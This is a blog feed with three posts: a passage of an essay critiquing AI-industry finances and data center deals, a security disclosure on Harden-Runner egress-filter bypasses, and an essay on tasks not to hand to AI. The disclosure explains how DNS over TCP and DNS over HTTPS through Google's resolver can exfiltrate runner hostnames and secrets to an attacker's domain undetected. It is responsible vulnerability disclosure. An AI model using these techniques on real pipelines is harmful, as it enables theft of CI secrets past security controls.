million a month for a company that makes over $11 billion a year. Shopify, the company that mandates you prove that AI can’t do a job before asking for resources , does not break out AI revenue. Workday, a company that makes about $2.5 billion a quarter in revenue, said it “generated over $100 million in new ACV from emerging AI products, [and that] overall ARR from these solutions was over $400 million.” $400 million ARR is $33 million a month.  To be clear, ARR is not a consistent figure, and churn happens all the time, especially for products like LLMs that have questionable outcomes and high prices. Four fucking years of this and we’re still talking about this stuff in riddles, mostly because it’s a terrible business. Then there’s the infrastructure issue. One of the more-recent (and egregious) failures of journalism is the reporting of data center deals. Before we go any further, one very important detail: when you read “active power,” that does not mean actual available compute capacity, which is called “IT load.” Per my premium data center model from a few months ago , you should take any “active power” and divide it by 1.3 to represent “PUE” — the standard for power usage effectiveness that calculates for everything that gets the power to the IT gear, and all the infrastructure that’s necessary to keep things running, like cooling systems. Anywho, Bloomberg just reported that Meta had signed a “$27 billion” compute capacity deal with “$12 billion of capacity available in 2027” with AI compute company Nebius. Based on discussions with numerous experts in AI infrastructure, it works out to about $12.5 million per megawatt of compute, meaning that “$12 billion of dedicated capacity” would be around 960MW of IT Load. And, of course, Nebius just raised $3.75bn in debt on the back of that compute deal .  This is on top of Microsoft’s $17.4 billion deal , and, of course, Meta’s $3 billion deal from last year.  One little problem: as of its February 12 2026 Letter to Shareholders , Nebius has around 170MW of active power .  How the fuck is it going to have that capacity ready, exactly?  For some context, CoreWeave — an AI compute company backed by ( and backstopped by ) NVIDIA with an entirely separate company building its capacity (Core Scientific) with backing from Blackstone and seemingly every major financier in the world — managed to go from 420MW of active power (NOT IT LOAD) in Q1 2025 to 850MW in active power in Q4 2025 , with much of that already under construction in Q1 2025.  Nebius only started building its 300MW of New Jersey-based compute in March 2025 , and based on its letter to shareholders, things aren’t going very well at all.  Then there’s Nscale, a company that raised $2 billion from NVIDIA, Lenovo and a bunch of other investors , and this week signed a “1.35GW deal” with Microsoft to fill a data center full of the latest generation of Vera Rubin GPUs.  In September 2025, NVIDIA CEO Jensen Huang said that the UK was going to be an “ AI superpower ” as he plunged hundreds of millions of dollars into Nscale as part of an “ historic commitment to the UK AI sector” between NVIDIA, OpenAI, and Microsoft.  When The Guardian visited the supposed site of Nscale’s UK-based data center in February 2026 — which is meant to be built by the end of the year — it found “...a depot stacked with pylons and scrap metal under a corrugated roof, while flatbed lorries drove in and out stacked with poles.” As part of the investigation, The Guardian found that the supposed billions of dollars in data center commitments made by Nscale and CoreWeave were never checked by the government, and that no mechanism existed to audit them. The response from both CoreWeave and Nscale was that these billions of dollars of investments would mostly be in NVIDIA GPUs, which is where we get to the “why” of these massive compute contracts. You see, when Nebius, or Nscale, or CoreWeave signs a giant deal that it doesn’t have the capacity to provide, it does so specifically to raise debt on the contract to buy NVIDIA GPUs. See the below diagram from CoreWeave’s Q1 2025 earnings presentation : If people were actually paying attention, they’d see the immediate problem: a data center takes an incredible amount of time to build, and takes longer depending on the amount of capacity necessary .  It’s a deeply cynical con. Hyperscalers like Microsoft and Meta are paying for these contracts because they don’t reflect as assets on the balance sheet, all while moving the risk onto the AI compute company — and if the AI company misses a deadline, the hyperscaler can walk away.  For example, Nebius’ deal with Microsoft from last year has a clause that says that “...fails to meet agreed delivery dates for a GPU Service and the Company cannot provide alternative capacity, Microsoft has the right to terminate that GPU Service.”  Based on discussions with people with direct knowledge of its infrastructure, Microsoft has already set up Nebius to fail, with the expectation that it would have over 50MW of IT load specifically made up of NVIDIA’s GB200 and GB300 GPUs available by the end of April, with at least another 150MW of IT load (or more) by the end of the year for a company that only has about 130MW of IT Load in its entire global infrastructure, most of which isn’t in Vineland, New Jersey . Hyperscalers are helping no-name companies with little or no history or experience in building data centers borrow billions of dollars in debt which is increasingly funded by people’s retirements and insurance funds lured in by the idea of “consistent yields” from companies that cannot afford to do business without convincing everybody to believe the illogical.  Data centers take forever to build. The “1.2GW” (so 880MW of IT load) Stargate Abilene’s first two buildings were meant to be fully energized by the middle of 2025 . Only the first two-buildings’ worth of 96,000 GPUs were “delivered” by the middle of December 2025 , and while the entire project was meant to be energized by mid-2026 , it appears that only two buildings are actually ready to go.  Every time you report on these deals should include a timeline. In the end, I bet Stargate Abilene never gets built, but if it does, I’d be shocked if it’s done before the middle of 2027, which would mean it takes about 3 years per Gigawatt of power, or about a year per 293MW of IT load.  I have read absolutely zero fucking stories about data center development that take this into account. The flippancy with which the media reports on these data centers — both in the structure of the deals and the realities of the construction ( I go into detail about this in a premium from late last year , but making data centers is hard ) — is allowing con artists to get rich and creating the conditions for yet another great financial crisis.  Pension funds and state investment boards are reading about these deals, seeing “Microsoft,” and assuming that everything will be fine, per my Hater’s Guide To Private Equity : All that the pension fund sees is an article on CNBC or Bloomberg and the name of a company like Microsoft or Meta. In turn, they (or the private credit firm managing their money) buy bonds or fund these debt deals because they see them as stable, straightforward, reliable investment yields, because the media and private credit firms are selling them as such. In reality, data center debt deals are incredibly dangerous, as each one is effectively a bet on both the existence of AI demand (so that the debt can be repaid with revenue) and the existence of the company in question as an ongoing concern. Nscale, Nebius and CoreWeave are only a few years old, and the concept of a 1GW data center is not much older. During the great financial crisis, massive amounts — billions and billions of dollars’ worth — of pension and insurance funds went into Collateralized Debt Obligations (CDOs) that were rated as AAA despite being a rat king of low-grade (and in many cases delinquent) debt.  This time around, data center debt deals are often given junk ratings — such as the B+ rating given to one of CoreWeave’s 2025 debt deals — which might make you think that there’s nothing to worry about, and that investors would naturally steer clear of these investments. The problem is that the markets have AI psychosis, and thus believe anything to do with data centers is a natural winner. Blackstone funded part of its $38 billion investment in Oracle’s data centers — you know, the ones explicitly built for OpenAI, which cannot afford to pay for the compute — using its insurance funds. Per The Information : This is the standard line from anybody in finance about data centers, and is based on little more than wish-casting and fantasy. These are brand new kinds of debt for some of the largest infrastructure projects in history, and as I’ve discussed repeatedly, outside of hyperscalers moving compute off of their balance sheets, there’s only a billion dollars of compute demand . 77% of CoreWeave’s 2025 revenue — and keep in mind that CoreWeave is the largest independent AI compute provider — was from Microsoft and NVIDIA, the latter of which plans to spend $26 billion in the next five years on renting back its GPUs…which suggests that little organic demand exists. 2026 or 2027’s great financial crisis will replace “homes” with “data centers,” and I worry it’ll be calamitous for the pensions and insurance funds that have tied their futures to AI.  Even putting aside my own personal feelings about LLMs…I’m just not sure why we’re doing this anymore.  Okay, okay, I know why we’re doing it — the software industry is out of hypergrowth ideas and has been in a years-long decline since 2018, though it briefly had a burst of excitement in 2021 when money was cheap and everybody was insane after the lockdowns ended. Nevertheless, AI has become one of the largest cons in history, bought and sold based on stuff it can’t do (but might do, one day, at a non-specific time), constantly ignoring the blatant swindles and acidic economics that are only made possible with regulators and the media and the markets piloted by people that don’t know or want to know what’s actually happening. If you are an AI fan, I need to genuinely ask you to consider whether what you’re impressed by is what the LLMs can do today rather than what they might be able to do tomorrow. If you’re excited based on the potential , you’re not excited about technology, you’re excited about marketing.  And I get it. The tech industry hasn’t had anything really exciting in a while. It’s easy to get swept away by hype, especially when everybody is being swept away in exactly the same way. It’s hard to push back when Microsoft, Google, Meta and Amazon are all participating in a financial death cult, and their revenues keep growing — having to understand anything more than the headlines is tough and you’ve got all this shit to do and it’s so much easier to just nod and agree with everybody else. But know that this is an industry that sells itself on fear and lies. Know that LLMs cannot do many of the things that people talk about — they do not blackmail people , no GPT-4 did not trick a taskrabbit , and every single time an AI CEO says AI “will” do something you should spit in their fucking face for making shit up not print it without a second’s thought. It’s time to get specific. What will AI do, and when will it do it? What will the actual software be? How will it work? How much will it cost? How will it make money? How will it become profitable?  Because right now we’re being sold a lie and I’m sick of it, almost as sick as I am of seeing critics framed as outlier factions spreading conspiracy theories. I’ve proven my point again and again and again. Where is the same effort from the AI boosters? All I see is the occasional desperate attempt to claim that LLMs doing what they’ve always done is somehow remarkable?  Oh wow, so you can code a clone of an open source software project , all set up with an LLM that may or may not get the code right. Oh, someone was able to vibe code something that may or may not work and looks exactly the same as every other vibe code project. Congratulations on making a website that’s purple for some reason — you’re puking out a facsimile of an era of websites defined by the colour scheme chosen by Tailwind CSS .  I also want to be clear that I am extremely nervous about how many people appear to be fine with not reading code. I am currently (very slowly) learning Python, and every new thing I learn reinforces my overwhelming anxiety that there is a lot of software being written today by people who don’t read the output from LLMs and, in some cases, may not have understood it if they did. While I’m not saying all or even many software engineers might do this, I am alarmed by the idea that it’s becoming more commonplace — and even more alarmed that the reaction appears to be “ah it’s fine who gives a shit, it works.”  Guess what! It doesn’t always work. Amazon Web Services had multiple recent outages caused by use of its Kiro AI coding tool, and while it insists that AI isn’t to blame , it also convened an internal meeting to discuss this specific issue, and The Financial Times reported that Amazon now requires junior and mid-level engineers to get sign off on AI-assisted changes to code. However you may feel about Amazon as a service, its engineers are likely indicative of corporate engineering on some level, which is making me wonder if we’re not going to have some real problems in software development in the next few years as a result. What does the software industry look like if nobody is actually reading their code? How many software engineers are comfortable doing this? I’m sure somebody will read this and get terribly offended, but to be clear, I’m not accusing you of copy-pasting code you can’t understand and being happy if it works unless that’s exactly what you’re doing.   To be explicit, allowing LLM to write all of your code means that you are no longer developing code, nor are you learning how to develop code, nor are you going to become a better software engineer as a result.  This isn’t even an insult or hyperbole. If you are just a person looking at code, you are only as good as the code the model makes, and as Mo Bitar recently discussed , these models are built to galvanize you, glaze you, and tell you that you’re remarkable as you barely glance at globs of overwritten code that, even if it functions, eventually grows to a whole built with no intention or purpose other than what the model generated from your prompt.  I’m sure there are software engineers using these models ethically, who read all the code, who have complete industry over it and use it like a glorified autocomplete. I’m also sure that there are some that are just asking it to do stuff, glancing at the code and shipping it. It’s impossible to measure how many of each camp there are, but hearing Spotify’s CEO say that its top developers are basically not writing code anymore makes me deeply worried, because this shit isn’t replacing software engineering at all — it’s mindlessly removing friction and putting the burden of “good” or “right” on a user that it’s intentionally gassing up. Ultimately, this entire era is a test of a person’s ability to understand and appreciate friction.  Friction can be a very good thing. When I don’t understand something, I make an effort to do so, and the moment it clicks is magical. In the last three years I’ve had to teach myself a great deal about finance, accountancy, and the greater technology industry, and there have been so many moments where I’ve walked away from the page frustrated, stewed in self-doubt that I’d never understand something. I also have the luxury of time, and sadly, many software engineers face increasingly-deranged deadlines set by bosses that don’t understand a single fucking thing, let alone what LLMs are capable of or what responsible software engineering is. The push from above to use these models because they can “write code faster than a human” is a disastrous conflation of “fast” and “good,” all because of flimsy myths peddled by venture capitalists and the media about “LLMs being able to write all code.” The problem is that LLMs can write all code, but that doesn’t mean the code is good, or that somebody can read the code and understand its intention, or that having a lot of code is a good thing both in the present and in the future of any company built using generative code. And in the end, where are the signs that this is working? Where are the vibe coded software products destabilizing incumbents? Where are the actual software engineers being replaced — not that I want this to happen, to be clear — by LLMs, outside of AI-washing stories that have got so egregious that even Sam Altman called it out ? Where is the revenue? Where are the returns? Where are the outcomes?  Why are we still doing this? Anthropic is intentionally subsidizing its subscribers’ compute in an attempt to gain market share. Anthropic is incapable of creating stable limitations on its models’ compute costs, as Large Language Models cannot be “limited” in a linear sense to “only spend” a certain amount of tokens, as it’s impossible to guarantee how many tokens a task might take.  While I must be clear that Anthropic can limit Claude subscriptions, as can OpenAI limit ChatGPT, I doubt either can do so with precision. Hyperscalers are seeing incredible revenue growth, which is coming from AI! - why aren’t they telling us their AI revenues, then? Also, every single hyperscaler has hiked prices in the last few years, with Microsoft’s latest increases including a 33% increase on cheap subscriptions for front-line workers . Fun fact! Microsoft was the only hyperscaler to ever talk about actual AI revenues, and last did so in January 2025 when it said it had reached a “ $13 billion run rate ” (so $1.03 billion). It has never done so again. We’re in the early day- shut up. Stop it. We’re nearly four years in. What’re you talking about?  The exponential growth in capabilities of AI models- I am calling Jigsaw from “Saw” if you cannot express to me in clear, certain and direct terms what it is that’s actually changed. No benchmarks, either! They had to stop using SWE-Bench because models were trained specifically to solve it . Show me something that an LLM created, all on its own, and it better be fucking great, and fast too. Oh it “sped up coders”? How? To what end? Is the code better? Did they lay people off? Block laid off 4000 people because of AI- Yes hello, Mr. Jigsaw? Yeah it’s Ed, you had me chained against a radiator the other week. No, I’m doing a lot better, I’m glad we talked things out. Anyway, I need your help with something. Everybody is saying that Block laid off 4000 people because of AI, and that proves something! All Jack Dorsey said was that “[Block is] already seeing that the intelligence tools [it’s] creating and using…are enabling a new way of working which fundamentally changes what it means to build and run a company.” I know, that doesn’t mean anything, and all Block is doing is AI-washing, which is when a company uses AI as a scapegoat to justify laying people off.  No, no, don’t handcuff anyone to a radiator, I just needed somebody to talk to. Maybe later, okay? Jokes aside, Block — like many other companies — aggressively recruited during the pandemic , with headcount growing by 2.5x between 2019 and 2025 . And now, as the market conditions are looking choppier, it seems like it’s trying to Ozempic away some of its corporate “bloat.” Saying you’re firing people because of AI is a bit less embarrassing than saying “we fucked up.”  [Software company] is still growing, so AI must be helping?- Is that actually true? Have you looked? Because if you haven’t looked, I wrote about this in the Hater’s Guide To The SaaSpocalypse . AI is not actually driving much revenue at all!

0 views
devansh 1 months ago

More egress filtering bypasses in harden-runner

Egress filtering in CI/CD is supposed to keep secrets in and attacker callbacks out. If your build step only needs to talk to , it shouldn't be able to reach anything else. StepSecurity's Harden-Runner does this for GitHub Actions — you give it a list of allowed endpoints, set , and everything else gets denied. The filtering is domain-based. It watches outbound connections, checks the destination, and blocks anything not on the list. That works fine as long as data leaves through a visible connection to a visible domain. DNS gives you two ways around that. The first is DNS over TCP. Harden-Runner doesn't adequately restrict DNS queries sent over TCP, so a single command bypasses the entire policy. The second is DNS over HTTPS (DoH), where a DNS query gets wrapped inside a normal HTTPS request to a public resolver like . The resolver acts as a proxy — Harden-Runner sees a legitimate HTTPS connection and lets it through. It never looks at what's inside. Both issues affect Harden-Runner v2.13.3 (community version) and likely all prior versions. Harden-Runner enforces egress policies on GitHub runners by filtering outbound connections at the network layer. When is enabled with a restrictive list, all non-compliant outbound traffic should be denied. A typical hardened workflow: After this step, any outbound connection to a domain or port not on the whitelist should be blocked. DNS queries usually go over UDP on port 53. But DNS also works over TCP on the same port — it's standard, well-documented, and tools like support it with a flag. It's commonly used for large responses and zone transfers, nothing exotic. Harden-Runner doesn't adequately restrict DNS queries sent over TCP. While it may handle standard UDP DNS and HTTPS connections, TCP-based DNS queries to an external resolver go through without being blocked or detected. That means an attacker can run: The query goes over TCP to Google's resolver, gets forwarded to 's nameserver, and the attacker reads the data out of the subdomain labels. Harden-Runner's dashboard shows zero outbound destinations and zero detections. is pre-installed on every Ubuntu runner. Harden-Runner shows 0 outbound destinations , 0 HTTPS events , and 0 detections . The Burp Collaborator server receives the DNS query. The entire egress block policy bypassed with a single command. Step Security Dashboard (our C2 domain is not getting flagged) Data exfiltration to our C2 DNS over HTTPS (DoH) wraps DNS queries inside standard HTTPS requests. From the network's perspective, a DoH request to looks like a normal HTTPS connection to a well-known endpoint. Harden-Runner sees it and lets it through. The idea is simple, use as a proxy. An attacker crafts a DNS query where the domain being resolved is , sends it as an HTTPS POST to , and Google's resolver forwards it to the attacker's authoritative nameserver. The data is encoded in the subdomain labels, the runner's hostname, environment variables, secrets, whatever fits. The egress filter sees an HTTPS connection to a legitimate destination. It never inspects what's inside. The attacker's domain never appears in any connection log. The workflow sets up Harden-Runner with a restrictive policy (only ), then runs a Python script that exfiltrates the runner's hostname via DoH through Google's resolver: The script builds a DNS wire-format query with the runner's hostname encoded as a subdomain, then sends it as a DoH request to : PoC Execution Step Security Dashboard (our C2 domain is not getting flagged) Data exfiltration to our C2 Harden-Runner shows 1 destination ( ), 0 HTTPS events , and 0 detections . The Collaborator server receives the DNS query with the runner's hostname. Data exfiltrated cleanly through a permitted HTTPS connection — acted as an unwitting proxy. Both vulnerabilities were reported to the StepSecurity team in early December 2025 via GitHub Security Advisories. The 90-day disclosure timeline was applied naturally, with the blog post date set for mid-March, 2026. StepSecurity acknowledged the reports over email, but my last follow-up message on the advisories asking for updates went unanswered and no CVE was issued. These were tested against the community version of Harden-Runner (v2.13.3). It's possible this was addressed in step-security/agent#469 , but I have not tested it. Since the 90-day disclosure window has passed and I did not hear back about a CVE, I am disclosing now. CVEs are pending. What is Harden-Runner's Egress Policy? Egress Block Policy Bypass via DNS over TCP Proof of Concept Egress Policy Bypass via DNS over HTTPS — Proxying DNS queries using Google's resolver Proof of Concept Disclosure Timeline Discovery & Report (DNS over TCP) : 4th December 2025 ( GHSA-g699-3x6g-wm3g ) Discovery & Report (DNS over HTTPS) : 5th December 2025 ( GHSA-46g3-37rh-v698 ) Vendor Contact : 4th–5th December 2025 Vendor Acknowledgment : Acknowledged over email Possible Fix : step-security/agent#469 — not tested Public Disclosure : 15th March 2026

0 views
Jampa.dev 1 months ago

Things I still wouldn’t delegate to AI

When it comes to AI, I consider myself a “skeptical optimist.” I think it has evolved a long way. I even  (controversially) put it in my testing pipeline . But sometimes, when I see how others use it, I wonder: are we going too far? I’m not talking just about people simply  handing over their email inbox to OpenClaw . I’m referring to major incidents like how “ AWS suffered ' at least two outages’ caused by AI tools. ”  Thanks for reading Jampa.dev! Subscribe for free to receive new posts and support my work. Code is cheap now, and we can fully delegate it to AI, but coding is only a small part of our jobs . The others, like handling incidents caused by AI code, are not. In all the situations below, you'll notice a pattern: people think “AI can handle most of it, so why not all of it?” and here’s how that leads to disaster. The misuse of automation in hiring predates the rise in LLMs. Eleven years ago, I applied for a Django role and got rejected within  two minutes at 01 AM , because I needed to know more about “Python” for the job. The email seemed to be written by a person. I submitted a new application with  just one word added  and received an interview invitation… The rejection was because the scanner didn’t find the word ‘Python’.  The main problem with companies that pull “clever” stunts like these is that they exclude great candidates. Not only that, but people will notice your flaws and share them publicly on platforms like Glassdoor, which can tank your reputation. Some argue that automation is necessary because applicant volume can become overwhelming. I disagree. During the COVID hiring surge, I reviewed  over 1,000 resumes a year  and never considered automating screening. The reason why you shouldn't automate hiring is that it is the most important thing you do. Hiring well is the most important thing in the universe. […] Nothing else comes close. So when you’re working on hiring […] everything else you could be doing is stupid and should be ignored! — Valve New Employee Handbook Even with 300 applicants each month, you can review all the resumes in less than an hour by using better judgment than AI.  That one hour spent is more valuable than dismissing a potentially great candidate . Finding the right candidate early also reduces the hours spent on interviews. Now that people are embedding LLMs into the hiring process, the situation has worsened. I see many pitches for tools that claim to be better at evaluating candidates’ interview performance than a human, which is simply absurd. Hiring is a human process : you need to understand not only what they say that makes sense, but also what excites and motivates them to see if they’ll be a good fit for the role.  You can’t measure qualities like enthusiasm and soft skills with AI. It will only accept what the candidate says at face value. A candidate might claim they are passionate about working with bank accounting software in Assembly at your Assembly bank firm, but are they really? From my personal experience with AI review tools like CodeRabbit, Claude, and Gemini, I've noticed that a pull request with 12 issues results in 12 comments, but only about 6 are actual problems. The rest tend to be just noise or go unaddressed. This doesn't mean those tools are useless. Letting them do an initial pass is very helpful, and some humans wouldn't catch some of the issues they find, especially the deep logical problems. The issue with automated review tools is that they are becoming the  de facto  gatekeepers  for deploying code to production, leading to future outages and a low-quality codebase. The inmates have taken over the asylum, and we now have AI reviewing code generated by AI. Review tools are very focused on checking whether your PR makes logical sense, such as whether you forgot to add auth behind a route, but they can't, for example, judge whether your code worsens the codebase. They can't raise the bar, which is the best part of human reviews.  Every time we create or review a PR, it's a chance to learn  how to become a better engineer and to leave the codebase in a better state than we found it. Comments from peers like “you are duplicating logic, you should DRY these components” encourage us to review our own code and improve as engineers. Relying only on AI review takes away that chance. Most incidents I observe happen because AI struggles to evaluate second-order effects; it overlooks the Chesterton fence. For example, if you try to delete or change a downstream parameter, like a parameter needed and was removed by an LLM, which wasn’t caught by linting. This reflects a limitation of current models: they can't review your code across repos. I'm tired of reading AI-generated writing: it just doesn't respect the reader's time. I see many AI-produced texts that could be shortened by a quarter without losing any important information. Reading emails, meeting notes, or technical documents filled with emoji spam and strange analogies (“it's not X, it's Y”) is tiring. When I see the words  “Executive Summary ,” I often hesitate to read it. I would have written a shorter letter, but I did not have the time. — Blaise Pascal There is power in simplicity and in respecting your reader's time. Most of my blog posts are cut by 50% just before I publish them. Most people I know who use AI for communication do so because they believe their writing is not good. But honestly, the  goal of communication isn't grammar skills but to get the point across .  Good grammar is often overrated anyway. One of my favorite documents is the  leaked MrBeast memo PDF , which is full of grammatical and punctuation errors but clearly communicates its message through a “braindump”, much better than any LLM ever could. When you ask an LLM about your roadmap, you're likely querying what countless other companies with very different issues have already tried. The AI relies on patterns from its training data, and in my experience, those patterns tend to be too generic compared to the insights of a seasoned domain expert. If your software is meant for hospital accountants, do you think they take time to blog about the frustrations of their workflow? The knowledge is stored in their minds, and you need to extract it. This vital knowledge is never documented and thus never accessible to an LLM. I spent three years researching and working on accessibility for nonverbal individuals. If I ask the AI about what this industry lacks, it will start discussing the need for better UX solutions (there are countless papers on this, I even naively wrote one). Still, I saw multiple companies enter the market with great UX products only to crash and burn. After a while, I realized that poor UX apps still dominate adoption because these companies invest millions in lobbying, partnerships with insurance companies, and training, which is the thing no one talks about. I get many messages from bots on Reddit and LinkedIn about AI management tools, but  as I mentioned before , they lack context. The worst part is that they think they can make judgments with the limited context they have. Here’s an example of a feedback tool output: “This engineer sucks, they do 40% fewer PRs than the median, I marked him as an underperformer … I also told your boss, HR and CTO about it, better do something!” - Some tool with a fancy name and a “.io” domain But yet, that engineer is one of the best I have worked with. The issue is that they try to outsmart the manager, which leads lazy managers to use the AI's suggestions as an excuse, resulting in poorly thought-out feedback because “ The computer says no .” Think of the current LLMs as an “added value tool” , not a product, and definitely not an expert. Most of what I wrote above is problematic because it overestimates what LLMs can do and enables them to operate unsupervised. You can't go back in time after AI makes a mistake, and there are no guardrails once a mistake is made. I received a lot of criticism for my post about using  AI to select E2E tests  in a PR pipeline. Yes, it sounds crazy, but this is the “added value” part: if the AI fails at selecting the right test, we will catch it before deployment. The value provided is that having it is better than having no pre-checks at all. Before giving AI control, ask how resilient our system is when (not if) the AI screws up, and ensure you have stronger safety nets before delegating completely. Thanks for reading Jampa.dev! Subscribe for free to receive new posts and support my work.

0 views